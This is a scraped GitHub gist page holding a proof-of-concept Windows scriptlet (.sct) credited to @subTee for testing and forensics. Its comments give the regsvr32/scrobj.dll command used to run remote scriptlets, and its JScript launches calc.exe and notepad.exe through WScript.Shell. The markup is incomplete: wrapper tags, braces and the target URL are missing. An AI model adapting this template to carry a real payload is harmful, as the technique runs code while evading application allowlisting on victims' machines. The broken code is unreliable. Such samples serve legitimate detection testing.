Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
.SCT for testing (++++ @subTee)
<?XML version="1.0"?>
<!-- regsvr32 /s /n /u /i: scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- @RedCanary - -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
<method name="Exec"></method>
<script language="JScript">
function Exec()
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.